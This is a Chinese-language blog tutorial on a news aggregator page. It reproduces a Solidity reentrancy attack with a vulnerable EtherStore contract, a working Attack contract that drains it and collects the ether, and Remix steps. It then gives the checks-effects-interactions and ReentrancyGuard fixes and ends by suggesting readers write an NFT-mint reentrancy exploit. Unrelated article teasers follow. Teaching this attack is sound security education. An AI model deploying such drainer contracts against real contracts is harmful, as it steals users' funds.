news 2026/2/11 12:43:11

智能合约安全审计:复现“重入攻击 (Reentrancy)”,一行代码是如何盗走 1000 ETH 的?

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
智能合约安全审计:复现“重入攻击 (Reentrancy)”,一行代码是如何盗走 1000 ETH 的?

标签:#Web3Security #Solidity #Reentrancy #SmartContract #Blockchain #Audit


🏦 前言:银行柜员的失误

想象一个现实场景:
你去银行取钱。

  1. 检查:柜员查账,发现你有 100 元。
  2. 交互:柜员把 100 元现金递给你。
  3. 生效:柜员拿起笔,准备在账本上把你账户扣除 100 元。

重入攻击就在第 2 步和第 3 步之间发生了。
当你接过钱的瞬间(第 2 步刚开始,第 3 步还没做),你大喊一声:“嘿,我还要取 100 元!”
柜员因为还没来得及改账本,一看账上还是 100 元,于是递给你 100 元。
如此循环,直到银行金库被你搬空。

攻击流程图 (Mermaid):

受害者合约 (Bank)攻击者合约受害者合约 (Bank)攻击者合约初始状态: Hacker 存款 1 ETH, Bank 总余额 100 ETH触发 fallback() 函数!⚠️ 余额还没扣除! 依然显示有 1 ETH结果: Hacker 取走 2 ETH (甚至更多), 只扣了 1 次钱1. withdraw(1 ETH)检查余额: Hacker 有 1 ETH (Pass)2. 发送 1 ETH (使用 call)3. 再次调用 withdraw(1 ETH)4. 又发送 1 ETH5. 修改余额 (太晚了!)

💀 一、 漏洞复现:受害者合约 (EtherStore)

这是一个典型的“先转账,后扣款”的错误写法。

// SPDX-License-Identifier: MIT pragma solidity ^0.8.0; contract EtherStore { mapping(address => uint256) public balances; // 存钱 function deposit() public payable { balances[msg.sender] += msg.value; } // 取钱 (漏洞在这里!) function withdraw() public { uint256 bal = balances[msg.sender]; require(bal > 0, "No balance"); // ❌ 错误做法:先转账 (Interaction) // 使用 call 发送 ETH 会将所有剩余 Gas 转发给接收方,允许对方执行复杂逻辑 (bool sent, ) = msg.sender.call{value: bal}(""); require(sent, "Failed to send Ether"); // ❌ 错误做法:后扣款 (Effect) // 这一行在攻击发生时,还没来得及执行 balances[msg.sender] = 0; } // 查看金库总余额 function getBalance() public view returns (uint256) { return address(this).balance; } }

⚔️ 二、 编写攻击脚本:黑客合约 (Attack)

黑客合约利用 Solidity 的fallbackreceive函数机制。当它收到 ETH 时,这些函数会自动触发。

// SPDX-License-Identifier: MIT pragma solidity ^0.8.0; import "./EtherStore.sol"; contract Attack { EtherStore public etherStore; constructor(address _etherStoreAddress) { etherStore = EtherStore(_etherStoreAddress); } // 1. 回调函数:当收到 ETH 时自动触发 fallback() external payable { if (address(etherStore).balance >= 1 ether) { // 🔥 核心攻击逻辑:在收到钱的瞬间,递归调用 withdraw etherStore.withdraw(); } } // 2. 攻击入口 function attack() external payable { require(msg.value >= 1 ether, "Need 1 ETH to start attack"); // 先存 1 ETH 进去,获得“入场券” etherStore.deposit{value: 1 ether}(); // 发起第一次提款 etherStore.withdraw(); } // 3. 销赃:把偷来的钱转给黑客钱包 function collectEther() external { payable(msg.sender).transfer(address(this).balance); } }

🕵️‍♂️ 三、 实战步骤 (Remix)

  1. 部署 EtherStore
  • 部署受害者合约。
  • 切换其他账户(如 Account 2, Account 3),分别deposit10 ETH。此时金库有 20 ETH。
  1. 部署 Attack
  • 切换回黑客账户(Account 1)。
  • 部署 Attack 合约,构造函数填入 EtherStore 的地址。
  1. 发动攻击
  • 在 Attack 合约的attack函数中填入1 Ether
  • 点击transact
  1. 见证奇迹
  • 查看EtherStore的余额:变成了0
  • 查看Attack的余额:变成了21 ETH(本金 1 + 偷来的 20)。

现象解释:
你会发现在那一笔交易中,黑客合约像抽水机一样,利用那 1 ETH 的本金,反复循环调用withdraw,直到把受害者合约的余额抽干,循环才停止(触发fallback中的if判断)。


🛡️ 四、 防御方案:如何修复?

修复重入攻击主要有两种方法。

方案 A:检查-生效-交互 (Checks-Effects-Interactions)

这是 Solidity 编程的黄金法则。永远先修改状态变量,再进行外部调用。

function withdraw() public { uint256 bal = balances[msg.sender]; require(bal > 0); // ✅ 1. Check (已在上面) // ✅ 2. Effect (先扣款!) balances[msg.sender] = 0; // ✅ 3. Interaction (再转账) (bool sent, ) = msg.sender.call{value: bal}(""); require(sent, "Failed to send Ether"); }

即使黑客再次重入,因为balances[msg.sender]已经被清零,require(bal > 0)会直接拦截请求。

方案 B:重入锁 (ReentrancyGuard)

使用 OpenZeppelin 提供的修饰符,给函数上锁。

import "@openzeppelin/contracts/security/ReentrancyGuard.sol"; contract EtherStore is ReentrancyGuard { // 增加 nonReentrant 修饰符 function withdraw() public nonReentrant { uint256 bal = balances[msg.sender]; // ... 逻辑 ... } }

原理:进入函数前将锁置为TRUE,执行完置为FALSE。如果你在执行过程中试图再次进入,发现锁是TRUE,直接报错。


🎯 总结

重入攻击是 Web3 安全的入门必修课。它警示我们:在区块链世界,任何外部合约调用(Call)都是不可信的。

作为开发者,必须养成**“状态修改前置”**的肌肉记忆,或者做一名“复制粘贴工程师”,老老实实继承 OpenZeppelin 的ReentrancyGuard

Next Step:
现在的攻击是针对ETH转账的。你去研究一下ERC-721 (NFT)onERC721Received函数,或者ERC-1155协议,它们同样存在重入风险。尝试写一个针对 NFT 铸造(Mint)的重入攻击脚本,看看能不能一次 Gas 费铸造出 100 个 NFT?

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/2/8 9:31:46

大数据领域分布式计算的性能优化策略

大数据分布式计算性能优化:从“堵车”到“通途”的系统调校指南 关键词 分布式计算、性能优化、数据本地化、资源调度、Shuffle优化、并行度调整、容错机制 摘要 当你用分布式集群处理100TB日志时,有没有遇到过这样的场景:任务卡了6小时还没跑…

作者头像 李华
网站建设 2026/2/7 3:20:23

吐血推荐9个AI论文写作软件,专科生毕业论文轻松搞定!

吐血推荐9个AI论文写作软件,专科生毕业论文轻松搞定! AI工具助力论文写作,专科生也能轻松应对 在当前的学术环境中,AI工具已经成为许多学生不可或缺的助手,尤其是在论文写作方面。对于专科生来说,撰写一篇符…

作者头像 李华
网站建设 2026/2/2 12:24:18

第五届AIGC开发者大会年度对话:超级算力如何打造超级产品?

作者:王聪彬 现如今,算力正从技术底座走向产品前台,开始塑造产品形态和应用边界。随着优质算力在云、边、端环境中普及,企业和开发者开始关注如何将算力、高性能计算能力和软件平台结合起来,把技术潜力转化为可用、可落…

作者头像 李华
网站建设 2026/2/10 11:15:10

从“企业AI”到“AI企业”,这场会议把AI落地路径讲透了

作者:于佳卉 在2026第五届AIGC开发者大会上,由至顶科技主办的“企业AI应用与本地算力实践”分论坛成为现场焦点之一。来自企业级AI服务、前沿模型与推理技术、产业应用实践等领域的嘉宾,从产业趋势、工程方法、组织变革等多个维度&#xff0c…

作者头像 李华